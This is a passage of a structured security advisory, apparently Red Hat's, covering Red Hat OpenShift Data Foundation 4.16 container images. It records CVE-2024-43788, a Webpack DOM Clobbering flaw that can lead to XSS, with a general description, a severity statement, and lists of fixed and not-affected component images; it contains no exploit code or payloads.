"odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", }, product_reference: "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", }, product_reference: "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", }, product_reference: "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", }, product_reference: "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", }, product_reference: "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", }, product_reference: "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", }, product_reference: "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", }, product_reference: "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64 as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", }, product_reference: "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", relates_to_product_reference: "9Base-RHODF-4.16", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x as a component of RHODF 4.16 for RHEL 9", product_id: "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", }, product_reference: "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", relates_to_product_reference: "9Base-RHODF-4.16", }, ], }, vulnerabilities: [ { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", ], known_not_affected: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", 